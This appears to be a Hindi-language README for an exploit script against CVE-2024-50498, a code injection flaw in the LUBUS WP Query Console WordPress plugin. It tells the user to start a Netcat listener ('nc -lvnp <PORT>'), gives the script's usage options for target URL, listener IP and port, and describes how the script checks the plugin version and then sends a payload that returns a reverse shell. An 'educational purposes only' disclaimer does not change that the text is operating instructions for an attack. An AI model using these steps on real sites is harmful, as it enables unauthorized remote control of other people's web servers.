
CVE-2024-50498 के लिए एक्सप्लॉइट स्क्रिप्ट, WordPress WP Query Console में कोड इंजेक्शन, जो भेद्यता की जाँच करती है और रिवर्स शेल प्रदान करती है।
LUBUS WP Query Console में कोड जनरेशन के अनुचित नियंत्रण ('Code Injection') भेद्यता, कोड इंजेक्शन की अनुमति देती है। यह समस्या WP Query Console को प्रभावित करती है: n/a से 1.0 तक।
अपनी मशीन पर एक टर्मिनल खोलें और रिवर्स शेल कनेक्शन की प्रतीक्षा करने के लिए Netcat लिसनर शुरू करें
nc -lvnp <PORT>
usage: CVE-2024-50498.py [-h] -u URL -ip LISTENER_IP -P PORT
wordpress | Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code
Injection.This issue affects WP Query Console: from n/a through 1.0. script Exploit by: Nxploit Khaled_alenazi This script
is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this
script.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://example.com/wordpress)
-ip LISTENER_IP, --listener_ip LISTENER_IP
Your IP address for listening.
-P PORT, --port PORT Your listening port.
कमांड चलाने के बाद, रिवर्स शेल कनेक्शन के लिए Netcat टर्मिनल की निगरानी करें।
स्क्रिप्ट पहले प्लगइन संस्करण देखकर जाँच करेगी कि साइट असुरक्षित है या नहीं। यदि असुरक्षित है, तो यह रिवर्स शेल ट्रिगर करने के लिए पेलोड भेजती है। सफल होने पर, शेल कनेक्शन के लिए अपना Netcat टर्मिनल जाँचें।